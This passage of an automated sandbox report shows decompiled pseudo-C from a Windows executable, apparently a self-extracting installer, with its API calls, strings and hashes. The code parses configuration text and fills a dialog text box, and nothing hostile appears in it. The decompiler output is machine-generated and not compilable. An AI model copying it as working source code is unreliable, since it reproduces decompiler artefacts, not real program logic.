										__eflags =  *_t450 - _t279;
										if( *_t450 == _t279) {
											__eflags = _t450;
										}
										_t468[9] = E00A57625(_t372, _t450);
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t463 = _t468[0xe];
										E00A3E27C( &(_t463[0x28]), _t443, _t397, _t397, _t450);
										goto L122;
									}
									_t212 = _t462 - 1; // -1
									_t283 = _t450 + _t212 * 2;
									_t443 = 0x20;
									do {
										_t397 =  *_t283 & 0x0000ffff;
										__eflags = _t397 - _t443;
										if(_t397 == _t443) {
											goto L114;
										}
										__eflags = _t397 - _t468[0xf];
										if(_t397 != _t468[0xf]) {
											break;
										}
										L114:
										_t397 = 0;
										 *_t283 = 0;
										_t283 = _t283 - 2;
										_t462 = _t462 - 1;
										__eflags = _t462;
									} while (_t462 != 0);
									__eflags = _t462;
									if(_t462 != 0) {
										_t284 = 0x22;
										__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t284;
										if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t284) {
											__eflags = 0;
											 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
										}
									}
									goto L118;
								}
								_t468[6] = 0xd;
								_t468[5] = 0xa;
								do {
									_t399 = _t468[0x13];
									__eflags = _t268;
									if(_t268 == 0) {
										L75:
										_t443 =  *(_t399 + _t268 * 2) & 0x0000ffff;
										_t268 = _t268 + 1;
										_t468[0x15] = _t268;
										__eflags = _t443;
										if(_t443 == 0) {
											break;
										}
										__eflags = _t443 - _t468[4];
										if(_t443 != _t468[4]) {
											_t400 = 0xd;
											__eflags = _t443 - _t400;
											if(_t443 == _t400) {
												L93:
												__eflags =  *(_t468 - 0x40);
												if( *(_t468 - 0x40) == 0) {
													L105:
													 *(_t468 - 0x40) = _t372;
													_t462 = _t372;
													_t468[0xb] = _t372;
													L106:
													_t468[0xc] = _t462;
													goto L107;
												}
												_t468[7] = _t468[0xb];
												_t468[8] = E00A58CCE(_t372, _t462, _t468 - 0x40);
												_pop(_t401);
												__eflags = _t462;
												if(_t462 == 0) {
													L102:
													 *(_t450 + _t462 * 2) = 0;
													_t290 = 0x22;
													__eflags =  *_t450 - _t290;
													if( *_t450 == _t290) {
														__eflags = _t450;
													}
													_t468[9] = E00A57625(_t372, _t450);
													asm("movsd");
													asm("movsd");
													asm("movsd");
													E00A3E27C( &(_t468[0xe][0x28]), _t443, _t401, _t401, _t450);
													_t450 = _t468[0x11];
													_t268 = _t468[0x15];
													goto L105;
												}
												_t185 = _t462 - 1; // -1
												_t294 = _t450 + _t185 * 2;
												_t443 = 0x20;
												do {
													_t401 =  *_t294 & 0x0000ffff;
													__eflags = _t401 - _t443;
													if(_t401 == _t443) {
														goto L98;
													}
													__eflags = _t401 - _t468[0xf];
													if(_t401 != _t468[0xf]) {
														break;
													}
													L98:
													_t401 = 0;
													 *_t294 = 0;
													_t294 = _t294 - 2;
													_t462 = _t462 - 1;
													__eflags = _t462;
												} while (_t462 != 0);
												__eflags = _t462;
												if(_t462 != 0) {
													_t295 = 0x22;
													__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t295;
													if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t295) {
														__eflags = 0;
														 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
													}
												}
												goto L102;
											}
											_t404 = 0xa;
											__eflags = _t443 - _t404;
											if(_t443 == _t404) {
												goto L93;
											}
											__eflags = _t462 - 0x10000;
											if(_t462 >= 0x10000) {
												goto L107;
											}
											L92:
											 *(_t450 + _t462 * 2) = _t443;
											_t462 = _t462 + 1;
											goto L106;
										}
										__eflags = _t462 - 0x10000;
										if(_t462 >= 0x10000) {
											goto L107;
										}
										_t406 = ( *(_t399 + _t268 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t406;
										if(_t406 == 0) {
											_push(0x22);
											L88:
											_pop(_t407);
											 *(_t450 + _t462 * 2) = _t407;
											_t268 = _t268 + 1;
											_t468[0x15] = _t268;
											_t462 = _t462 + 1;
											goto L106;
										}
										_t410 = _t406 - 0x3a;
										__eflags = _t410;
										if(_t410 == 0) {
											_push(0x5c);
											goto L88;
										}
										_t411 = _t410 - 0x12;
										__eflags = _t411;
										if(_t411 == 0) {
											_push(0xa);
											goto L88;
										}
										_t412 = _t411 - 4;
										__eflags = _t412;
										if(_t412 == 0) {
											_push(0xd);
											goto L88;
										}
										__eflags = _t412 != 0;
										if(_t412 != 0) {
											goto L92;
										}
										_push(9);
										goto L88;
									}
									_t444 =  *(_t399 + _t268 * 2 - 2) & 0x0000ffff;
									__eflags = _t444 - _t468[6];
									if(_t444 == _t468[6]) {
										L42:
										_t443 = 0x3a;
										__eflags =  *(_t399 + _t268 * 2) - _t443;
										if( *(_t399 + _t268 * 2) != _t443) {
											L65:
											_t468[0x10] = _t399 + _t268 * 2;
											_t299 = E00A4045B( *(_t399 + _t268 * 2) & 0x0000ffff);
											__eflags = _t299;
											if(_t299 == 0) {
												L74:
												_t399 = _t468[0x13];
												_t268 = _t468[0x15];
												goto L75;
											}
											E00A40602(_t468 - 0x298, _t468[0x10], 0x64);
											_t303 = E00A56105(_t468 - 0x298, L" \t,");
											_t468[0x10] = _t303;
											__eflags = _t303;
											if(_t303 == 0) {
												goto L74;
											}
											 *_t303 = 0;
											E00A41DA7(_t468 - 0x298, _t468 - 0x16c, 0x64);
											E00A405A7(_t468 - 0xa4, _t468 - 0x108, 0x64);
											E00A40580(__eflags, _t468 - 0xa4, _t468 - 0x16c, 0x64);
											E00A405A7(_t468 - 0x40, _t468 - 0xa4, 0x32);
											_t318 = E00A56159(_t372, 0, _t443, _t462, _t468 - 0xa4,  *(_t468[0xe]), _t468[0xe][4], 4, E00A3D780);
											_t473 = _t473 + 0x14;
											__eflags = _t318;
											if(_t318 != 0) {
												_t322 =  *_t318 * 0xc;
												__eflags = _t322;
												_t156 = _t322 + 0xa6e270; // 0x28b64ee0
												_t468[0xb] =  *_t156;
											}
											_t268 =  &(( &(_t468[0x15][1]))[_t468[0x10] - _t468 - 0x298 >> 1]);
											__eflags = _t268;
											_t421 = _t468[0x13];
											while(1) {
												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
												__eflags = _t443 - _t468[0xa];
												if(_t443 == _t468[0xa]) {
													goto L72;
												}
												L71:
												__eflags = _t443 - _t468[0xf];
												if(_t443 != _t468[0xf]) {
													_t468[0x15] = _t268;
													goto L107;
												}
												L72:
												_t268 = _t268 + 1;
												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
												__eflags = _t443 - _t468[0xa];
												if(_t443 == _t468[0xa]) {
													goto L72;
												}
												goto L71;
											}
										}
										_t453 = _t468[0x15];
										_t324 = _t268 | 0xffffffff;
										__eflags = _t324;
										_t466 = _t372;
										_t468[0xd] = _t324;
										_t374 = _t468[0x13];
										 *_t468 = L"STRINGS";
										_t468[1] = L"DIALOG";
										_t468[2] = L"MENU";
										_t468[3] = L"DIRECTION";
										do {
											_t468[0x10] = E00A53E13(_t468[_t466]);
											_t326 = E00A56088( &(_t374[2]) + _t453 * 2, _t468[_t466], _t325);
											_t473 = _t473 + 0x10;
											__eflags = _t326;
											if(_t326 != 0) {
												L47:
												_t424 = _t468[0xd];
												goto L48;
											}
											_t346 =  &(_t468[0x10][_t453]);
											_t430 = 0x20;
											__eflags = _t374[2 + _t346 * 2] - _t430;
											if(_t374[2 + _t346 * 2] > _t430) {
												goto L47;
											}
											_t424 = _t466;
											_t453 = _t346 + 1;
											_t468[0xd] = _t424;
											L48:
											_t466 = _t466 + 1;
											__eflags = _t466 - 4;
										} while (_t466 < 4);
										_t462 = _t468[0xc];
										_t372 = 0;
										_t468[0x15] = _t453;
										_t450 = _t468[0x11];
										__eflags = _t424;
										if(__eflags != 0) {
											_t268 = _t468[0x15];
											_t399 = _t468[0x13];
											if(__eflags <= 0) {
												goto L65;
											} else {
												goto L53;
											}
											while(1) {
												L53:
												_t443 = _t399 + _t268 * 2;
												_t455 =  *_t443 & 0x0000ffff;
												__eflags = _t455 - _t468[0xa];
												if(_t455 == _t468[0xa]) {
													goto L55;
												}
												L54:
												__eflags = _t455 - _t468[0xf];
												if(_t455 != _t468[0xf]) {
													_t468[0x15] = _t268;
													_t425 = _t372;
													_t456 = 0x20;
													__eflags = ( *_t443 & 0x0000ffff) - _t456;
													_t468[0x10] = _t372;
													_t450 = _t468[0x11];
													if(( *_t443 & 0x0000ffff) <= _t456) {
														L60:
														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = 0;
														E00A41DA7(_t468 - 0x1d0, _t468 - 0xa4, 0x64);
														_t468[0x15] =  &(_t468[0x15][_t468[0x10]]);
														_t333 = _t468[0xd];
														__eflags = _t333 - 3;
														if(_t333 != 3) {
															__eflags = _t333 - 1;
															_t334 = "$%s:";
															if(_t333 != 1) {
																_t334 = "@%s:";
															}
															E00A3E5B1(_t468 - 0x108, 0x64, _t334, _t468 - 0xa4);
															_t473 = _t473 + 0x10;
														} else {
															_t338 = E00A53E49(_t468 - 0x1d0, _t468 - 0x1d0, L"RTL");
															asm("sbb al, al");
															_t468[0xe][0x64] =  ~_t338 + 1;
														}
														L51:
														_t268 = _t468[0x15];
														goto L107;
													} else {
														goto L57;
													}
													while(1) {
														L57:
														__eflags = _t425 - 0x63;
														if(_t425 >= 0x63) {
															break;
														}
														_t341 =  *_t443;
														_t443 = _t443 + 2;
														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = _t341;
														_t425 = _t425 + 1;
														_t342 = 0x20;
														__eflags =  *_t443 - _t342;
														if( *_t443 > _t342) {
															continue;
														}
														break;
													}
													_t468[0x10] = _t425;
													goto L60;
												}
												L55:
												_t268 = _t268 + 1;
												L53:
												_t443 = _t399 + _t268 * 2;
												_t455 =  *_t443 & 0x0000ffff;
												__eflags = _t455 - _t468[0xa];
												if(_t455 == _t468[0xa]) {
													goto L55;
												}
												goto L54;
											}
										}
										E00A405A7(_t468 - 0x108, 0xa639d0, 0x64);
										goto L51;
									}
									__eflags = _t444 - _t468[5];
									if(_t444 != _t468[5]) {
										goto L75;
									}
									goto L42;
									L107:
									__eflags = _t268 - _t468[0x12];
								} while (_t268 < _t468[0x12]);
								_t392 = _t468[0xb];
								goto L109;
							} else {
								L00A53E2E(_t461);
								goto L125;
							}
						}
						_t389 = _t385 >> 1;
						_t468[0x12] = _t389;
						goto L33;
					} else {
						goto L5;
					}
					goto L7;
					L5:
					E00A3E261(_t459, _t443, _t447);
					E00A3E261(_t459 + 0x14, _t443, _t447);
					_t447 = _t447 + 1;
					_t478 = _t447 -  *0xa6e720; // 0x64
					if(_t478 < 0) {
						goto L5;
					} else {
						_t372 = 0;
						goto L7;
					}
				}
			}

0x00a3da67
0x00a3da68
0x00a3da70
0x00a3da7a
0x00a3da84
0x00a3da85
0x00a3da86
0x00a3da89
0x00a3da8b
0x00a3da8e
0x00a3da91
0x00a3da97
0x00a3da99
0x00a3da9c
0x00a3daa2
0x00a3dade
0x00a3daa4
0x00a3daac
0x00a3dac4
0x00a3dace
0x00a3dace
0x00a3dae9
0x00a3daee
0x00a3daf6
0x00a3daf9
0x00a3db07
0x00a3e242
0x00a3e248
0x00a3e252
0x00a3e25a
0x00a3e25e
0x00a3db0d
0x00a3db0d
0x00a3db0f
0x00a3db15
0x00a3db33
0x00a3db3f
0x00a3db51
0x00a3db56
0x00a3db59
0x00a3db5c
0x00a3db5f
0x00a3db62
0x00a3db71
0x00a3db76
0x00a3db8b
0x00a3db90
0x00a3db93
0x00a3db95
0x00a3db95
0x00a3db98
0x00a3db9d
0x00a3dc5a
0x00a3dc5a
0x00a3dc5d
0x00a3dc6e
0x00a3dc76
0x00a3dc77
0x00a3dc7a
0x00a3dc7f
0x00000000
0x00000000
0x00a3dc85
0x00a3dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3dbb7
0x00a3dbc7
0x00a3dbcc
0x00a3dbd1
0x00a3dc52
0x00a3dc52
0x00a3dc55
0x00000000
0x00a3dbd3
0x00a3dbd3
0x00a3dbd3
0x00a3dbd6
0x00a3dbd8
0x00a3dbe1
0x00a3dc0c
0x00a3dc14
0x00a3dc40
0x00a3dc40
0x00a3dc44
0x00000000
0x00a3dc46
0x00a3dc46
0x00a3dba3
0x00a3dbab
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3dbab
0x00a3dc20
0x00a3dc30
0x00a3dc35
0x00a3dc3a
0x00000000
0x00000000
0x00000000
0x00a3dc3a
0x00a3dc14
0x00a3dbe9
0x00a3dbef
0x00a3dc00
0x00a3dc05
0x00a3dc0a
0x00a3dc4e
0x00000000
0x00a3dc4e
0x00a3dc0a
0x00000000
0x00a3dbef
0x00a3dc97
0x00a3dc9a
0x00a3dc9f
0x00a3dca9
0x00a3dcab
0x00a3dcaf
0x00a3dcb1
0x00000000
0x00000000
0x00a3dcc3
0x00a3dcc8
0x00a3dccc
0x00a3dcce
0x00a3dcd1
0x00a3dce1
0x00a3dce7
0x00a3dcea
0x00a3dcec
0x00000000
0x00000000
0x00a3dcf8
0x00a3dcfe
0x00a3dd04
0x00a3dd0a
0x00a3dd0d
0x00a3dd0f
0x00a3dd12
0x00a3dd12
0x00a3dd17
0x00a3dd19
0x00a3dd1b
0x00a3dd1b
0x00a3dd21
0x00a3dd31
0x00a3dd36
0x00a3dd40
0x00a3dd42
0x00a3dd46
0x00a3dd48
0x00a3dd56
0x00a3dd5a
0x00a3dd5c
0x00a3dd5e
0x00a3dd61
0x00a3dd63
0x00a3dd66
0x00a3dd69
0x00a3dd6c
0x00a3dd73
0x00a3dd7a
0x00a3e15c
0x00a3e15c
0x00a3e160
0x00a3e1e0
0x00a3e1e3
0x00a3e1e6
0x00a3e1ee
0x00a3e1f3
0x00a3e1f8
0x00a3e1fb
0x00a3e214
0x00a3e221
0x00a3e228
0x00a3e23a
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3e1fd
0x00a3e1fd
0x00a3e200
0x00a3e209
0x00a3e20e
0x00a3e20f
0x00a3e20f
0x00000000
0x00a3e1fd
0x00a3e165
0x00a3e16e
0x00a3e171
0x00a3e172
0x00a3e174
0x00a3e1af
0x00a3e1b1
0x00a3e1b7
0x00a3e1b8
0x00a3e1bb
0x00a3e1bd
0x00a3e1bd
0x00a3e1ca
0x00a3e1d0
0x00a3e1d1
0x00a3e1d2
0x00a3e1d3
0x00a3e1d9
0x00000000
0x00a3e1d9
0x00a3e176
0x00a3e17b
0x00a3e17e
0x00a3e17f
0x00a3e17f
0x00a3e182
0x00a3e185
0x00000000
0x00000000
0x00a3e187
0x00a3e18b
0x00000000
0x00000000
0x00a3e18d
0x00a3e18d
0x00a3e18f
0x00a3e192
0x00a3e195
0x00a3e195
0x00a3e195
0x00a3e19a
0x00a3e19c
0x00a3e1a0
0x00a3e1a1
0x00a3e1a6
0x00a3e1a8
0x00a3e1aa
0x00a3e1aa
0x00a3e1a6
0x00000000
0x00a3e19c
0x00a3dd80
0x00a3dd87
0x00a3dd8e
0x00a3dd8e
0x00a3dd91
0x00a3dd93
0x00a3e02a
0x00a3e02a
0x00a3e02e
0x00a3e02f
0x00a3e032
0x00a3e035
0x00000000
0x00000000
0x00a3e03b
0x00a3e03f
0x00a3e092
0x00a3e093
0x00a3e096
0x00a3e0b6
0x00a3e0b6
0x00a3e0ba
0x00a3e145
0x00a3e145
0x00a3e148
0x00a3e14a
0x00a3e14d
0x00a3e14d
0x00000000
0x00a3e14d
0x00a3e0c3
0x00a3e0cf
0x00a3e0d2
0x00a3e0d3
0x00a3e0d5
0x00a3e110
0x00a3e112
0x00a3e118
0x00a3e119
0x00a3e11c
0x00a3e11e
0x00a3e11e
0x00a3e131
0x00a3e137
0x00a3e138
0x00a3e139
0x00a3e13a
0x00a3e13f
0x00a3e142
0x00000000
0x00a3e142
0x00a3e0d7
0x00a3e0dc
0x00a3e0df
0x00a3e0e0
0x00a3e0e0
0x00a3e0e3
0x00a3e0e6
0x00000000
0x00000000
0x00a3e0e8
0x00a3e0ec
0x00000000
0x00000000
0x00a3e0ee
0x00a3e0ee
0x00a3e0f0
0x00a3e0f3
0x00a3e0f6
0x00a3e0f6
0x00a3e0f6
0x00a3e0fb
0x00a3e0fd
0x00a3e101
0x00a3e102
0x00a3e107
0x00a3e109
0x00a3e10b
0x00a3e10b
0x00a3e107
0x00000000
0x00a3e0fd
0x00a3e09a
0x00a3e09b
0x00a3e09e
0x00000000
0x00000000
0x00a3e0a0
0x00a3e0a6
0x00000000
0x00000000
0x00a3e0ac
0x00a3e0ac
0x00a3e0b0
0x00000000
0x00a3e0b0
0x00a3e041
0x00a3e047
0x00000000
0x00000000
0x00a3e051
0x00a3e051
0x00a3e054
0x00a3e07b
0x00a3e07d
0x00a3e07d
0x00a3e07e
0x00a3e085
0x00a3e086
0x00a3e089
0x00000000
0x00a3e089
0x00a3e056
0x00a3e056
0x00a3e059
0x00a3e077
0x00000000
0x00a3e077
0x00a3e05b
0x00a3e05b
0x00a3e05e
0x00a3e073
0x00000000
0x00a3e073
0x00a3e060
0x00a3e060
0x00a3e063
0x00a3e06f
0x00000000
0x00a3e06f
0x00a3e066
0x00a3e069
0x00000000
0x00000000
0x00a3e06b
0x00000000
0x00a3e06b
0x00a3dd99
0x00a3dd9e
0x00a3dda2
0x00a3ddae
0x00a3ddb0
0x00a3ddb1
0x00a3ddb5
0x00a3df29
0x00a3df2c
0x00a3df33
0x00a3df38
0x00a3df3a
0x00a3e024
0x00a3e024
0x00a3e027
0x00000000
0x00a3e027
0x00a3df4c
0x00a3df5d
0x00a3df62
0x00a3df67
0x00a3df69
0x00000000
0x00000000
0x00a3df71
0x00a3df84
0x00a3df99
0x00a3dfae
0x00a3dfc0
0x00a3dfdb
0x00a3dfe0
0x00a3dfe3
0x00a3dfe5
0x00a3dfe7
0x00a3dfe7
0x00a3dfea
0x00a3dff0
0x00a3dff0
0x00a3e004
0x00a3e004
0x00a3e006
0x00a3e009
0x00a3e009
0x00a3e00d
0x00a3e011
0x00000000
0x00000000
0x00a3e013
0x00a3e013
0x00a3e017
0x00a3e01c
0x00000000
0x00a3e01c
0x00a3e019
0x00a3e019
0x00a3e009
0x00a3e00d
0x00a3e011
0x00000000
0x00000000
0x00000000
0x00a3e011
0x00a3e009
0x00a3ddbb
0x00a3ddbe
0x00a3ddbe
0x00a3ddc1
0x00a3ddc3
0x00a3ddc6
0x00a3ddc9
0x00a3ddd0
0x00a3ddd7
0x00a3ddde
0x00a3dde5
0x00a3ddf6
0x00a3ddfd
0x00a3de02
0x00a3de05
0x00a3de07
0x00a3de22
0x00a3de22
0x00000000
0x00a3de22
0x00a3de0c
0x00a3de10
0x00a3de11
0x00a3de16
0x00000000
0x00000000
0x00a3de18
0x00a3de1a
0x00a3de1d
0x00a3de25
0x00a3de25
0x00a3de26
0x00a3de26
0x00a3de2b
0x00a3de2e
0x00a3de30
0x00a3de33
0x00a3de36
0x00a3de38
0x00a3de55
0x00a3de58
0x00a3de5b
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3de61
0x00a3de61
0x00a3de61
0x00a3de64
0x00a3de67
0x00a3de6b
0x00000000
0x00000000
0x00a3de6d
0x00a3de6d
0x00a3de71
0x00a3de78
0x00a3de7b
0x00a3de80
0x00a3de81
0x00a3de84
0x00a3de87
0x00a3de8a
0x00a3deab
0x00a3dead
0x00a3dec5
0x00a3decd
0x00a3ded0
0x00a3ded3
0x00a3ded6
0x00a3defc
0x00a3deff
0x00a3df04
0x00a3df06
0x00a3df06
0x00a3df1c
0x00a3df21
0x00a3ded8
0x00a3dee4
0x00a3def0
0x00a3def4
0x00a3def4
0x00a3de4d
0x00a3de4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3de8c
0x00a3de8c
0x00a3de8c
0x00a3de8f
0x00000000
0x00000000
0x00a3de91
0x00a3de94
0x00a3de97
0x00a3de9f
0x00a3dea2
0x00a3dea3
0x00a3dea6
0x00000000
0x00000000
0x00000000
0x00a3dea6
0x00a3dea8
0x00000000
0x00a3dea8
0x00a3de73
0x00a3de73
0x00a3de61
0x00a3de61
0x00a3de64
0x00a3de67
0x00a3de6b
0x00000000
0x00000000
0x00000000
0x00a3de6b
0x00a3de61
0x00a3de48
0x00000000
0x00a3de48
0x00a3dda4
0x00a3dda8
0x00000000
0x00000000
0x00000000
0x00a3e150
0x00a3e150
0x00a3e150
0x00a3e159
0x00000000
0x00a3dd4a
0x00a3dd4b
0x00000000
0x00a3dd50
0x00a3dd48
0x00a3dcd3
0x00a3dcd5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a3db17
0x00a3db1a
0x00a3db23
0x00a3db28
0x00a3db29
0x00a3db2f
0x00000000
0x00a3db31
0x00a3db31
0x00000000
0x00a3db31
0x00a3db2f

APIs

__EH_prolog.LIBCMT ref: 00A3DA70
_wcschr.LIBVCRUNTIME ref: 00A3DA91
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A3DAAC

Part of subcall function 00A3C29A: _wcslen.LIBCMT ref: 00A3C2A2

Part of subcall function 00A405DA: _wcslen.LIBCMT ref: 00A405E0

Part of subcall function 00A41B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A3BAE9,00000000,?,?,?,0001041E), ref: 00A41BA0

_wcslen.LIBCMT ref: 00A3DDE9
__fprintf_l.LIBCMT ref: 00A3DF1C

Strings

,, xrefs: 00A3DF57
*messages***, xrefs: 00A3DBFA
*messages***, xrefs: 00A3DBC1
$%s:, xrefs: 00A3DEFF
a, xrefs: 00A3DC16
, xrefs: 00A3DD6C
@%s:, xrefs: 00A3DF06, 00A3DF12
RTL, xrefs: 00A3DEDE
R, xrefs: 00A3DC0C

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 557298264-801612888
Opcode ID: 04ca3fc91a1eb8823a21a9592ab8bc33bda800560c11b13c7eb06428ad4bce32
Instruction ID: a52f1b54810b6706bf74461c30fc6b09de8bcdeb4a356faee4ca0716b2628cb9
Opcode Fuzzy Hash: 04ca3fc91a1eb8823a21a9592ab8bc33bda800560c11b13c7eb06428ad4bce32
Instruction Fuzzy Hash: 4E32BF72A00218EBCF28EF68D942BEA77B5FF55700F40455AF905AB281EBB1DD85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A4D4D4() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E00A4B568(); // executed
				_t46 = GetDlgItem( *0xa78458, 0x68);
				_t49 =  *0xa78463; // 0x1
				if(_t49 == 0) {
					_t44 =  *0xa78440; // 0x0
					E00A49285(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0xa635f4);
					 *0xa78463 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}

0x00a4d4db
0x00a4d4f5
0x00a4d4fa
0x00a4d500
0x00a4d502
0x00a4d508
0x00a4d510
0x00a4d51b
0x00a4d529
0x00a4d52f
0x00a4d52f
0x00a4d53f
0x00a4d549
0x00a4d559
0x00a4d561
0x00a4d565
0x00a4d56a
0x00a4d570
0x00a4d57b
0x00a4d585
0x00a4d58d
0x00a4d58d
0x00a4d59d
0x00a4d5ab
0x00a4d5ba
0x00a4d5c2
0x00a4d5d0
0x00a4d5e1
0x00a4d5e1
0x00a4d5fd

APIs

Part of subcall function 00A4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4B579
Part of subcall function 00A4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B58A
Part of subcall function 00A4B568: IsDialogMessageW.USER32(0001041E,?), ref: 00A4B59E
Part of subcall function 00A4B568: TranslateMessage.USER32(?), ref: 00A4B5AC
Part of subcall function 00A4B568: DispatchMessageW.USER32(?), ref: 00A4B5B6

GetDlgItem.USER32(00000068,00A8FCB8), ref: 00A4D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00A4AF07,00000001,?,?,00A4B7B9,00A6506C,00A8FCB8,00A8FCB8,00001000,00000000,00000000), ref: 00A4D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A4D51B
SendMessageW.USER32(00000000,000000C2,00000000,00A635F4), ref: 00A4D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A4D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A4D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A4D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A4D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A4D5E1
SendMessageW.USER32(00000000,000000C2,00000000,00A643F4), ref: 00A4D5F0

Strings

\, xrefs: 00A4D549

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 8f4ca7a166e39177ae78f31bd2fb2a16100bf9165e06ba0353e79f1d649ea6ca
Instruction ID: f1a75b24150a6616f6b285312c49f20e99a1cc8008ebbecf2de5940b6a19c148
Opcode Fuzzy Hash: 8f4ca7a166e39177ae78f31bd2fb2a16100bf9165e06ba0353e79f1d649ea6ca
Instruction Fuzzy Hash: 7931CF76245352BFE701DF609C4AFAF7FBCEB86708F000509F651961A0DB658A068B76

Uniqueness

Uniqueness Score: -1.00%

Function 00A5A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00A5A95B(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t57;
				signed int _t59;
				short* _t61;
				signed int _t65;
				short* _t70;
				int _t79;
				void* _t81;
				short* _t82;
				signed int _t88;
				signed int _t91;
				void* _t96;
				int _t98;
				void* _t99;
				short* _t101;
				int _t103;
				void* _t104;
				int _t105;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xa6e7ac; // 0xa7a040ce
				_v8 = _t49 ^ _t106;
				_t103 = _a20;
				if(_t103 > 0) {
					_t79 = E00A5EF4C(_a16, _t103);
					_t110 = _t79 - _t103;
					_t4 = _t79 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t79;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
